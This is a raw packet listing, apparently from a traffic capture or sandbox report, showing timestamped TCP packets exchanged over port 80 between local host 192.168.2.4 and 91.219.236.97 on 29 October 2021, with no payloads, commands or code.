Oct 29, 2021 20:50:40.666496038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.666528940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.698503971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698535919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698561907 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698585987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698607922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698632002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698657036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698669910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.698681116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698728085 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.698736906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698754072 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.698759079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698781967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698801041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698806047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.698817015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.698843956 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.731739044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731770992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731839895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731862068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731868029 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.731884003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731905937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731929064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731936932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.731952906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731977940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.731988907 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.731997013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.732022047 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.782480955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.782510996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.782531023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.782546997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.782632113 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.798897028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.798933029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.798954010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.798975945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.798995018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799015999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799037933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799060106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799065113 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799087048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799097061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799109936 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799124956 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799144030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799149036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799174070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799196005 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799196959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799221039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799247026 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799283981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799309015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799354076 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799379110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799400091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799423933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.799457073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.799530029 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.815915108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.815948963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.815972090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.815989017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.816092968 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.816133022 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.832037926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.832068920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.832089901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.832106113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.832174063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.832196951 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864305019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864336967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864360094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864382982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864408016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864418030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864433050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864450932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864465952 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864479065 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864568949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864592075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864614010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864633083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864636898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864655972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864661932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864680052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864698887 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864700079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864716053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864739895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864742994 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864761114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864782095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864794016 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.864798069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.864819050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.897110939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897149086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897172928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897198915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897227049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897249937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897269964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897278070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.897294998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897319078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897342920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897351980 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.897368908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897391081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897402048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.897413015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897427082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.897430897 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.897455931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.929398060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929430962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929452896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929471970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929563999 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.929646969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.929745913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929769039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929790974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929815054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.929826975 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.929903030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.929999113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.930061102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.930077076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.930113077 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.930150986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.979903936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.979924917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.979940891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.979957104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.979974031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.979991913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980007887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980024099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980040073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980052948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980052948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.980068922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980086088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980101109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980113029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:40.980118036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.980153084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:40.980173111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.013263941 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013289928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013305902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013323069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013402939 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.013412952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013468027 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.013477087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013494015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013509035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013521910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.013570070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.013952017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013968945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.013986111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.014003038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.014014959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.014027119 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.014050961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.045571089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.045595884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.045610905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.045624971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.045648098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.045679092 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046000957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046019077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046053886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046061993 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046087980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046098948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046144962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046163082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046179056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046192884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046232939 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046247959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046266079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046282053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046325922 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046325922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046344042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046356916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.046385050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.046416044 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.079787016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079828978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079857111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079883099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079905033 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.079909086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079931974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.079936028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079962969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.079972982 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.079991102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080015898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080030918 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.080043077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080070019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080094099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080107927 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.080115080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.080138922 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.111538887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111563921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111581087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111601114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111619949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.111656904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111675024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111686945 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.111725092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111757994 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111763000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.111778975 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.111809969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111843109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.111887932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.112031937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.112066031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.112107038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.112137079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.112569094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.143821955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.143893003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.143917084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.143938065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.143982887 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.143990993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144013882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144015074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144036055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144056082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144059896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144078970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144093990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144102097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144121885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144144058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144150019 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144166946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144188881 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144216061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144226074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.144233942 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144251108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.144279003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.176407099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176443100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176464081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176486969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176578999 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.176882029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176908016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176928997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176954985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.176963091 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.177000046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.177103043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177125931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177170038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177170038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.177191973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177246094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.177249908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177272081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177319050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.177356958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177375078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.177423000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.209356070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209391117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209412098 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209427118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209450006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209460974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.209472895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209494114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209507942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.209516048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.209558010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.300147057 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300182104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300201893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300223112 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300241947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300250053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.300262928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300278902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.300302029 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.300600052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323367119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323398113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323419094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323440075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323460102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323479891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323501110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323517084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323520899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323537111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323564053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323616028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323637962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323658943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323679924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323682070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323707104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.323728085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323765039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.323786974 CEST	80	49865	91.219.236.97	192.168.2.4
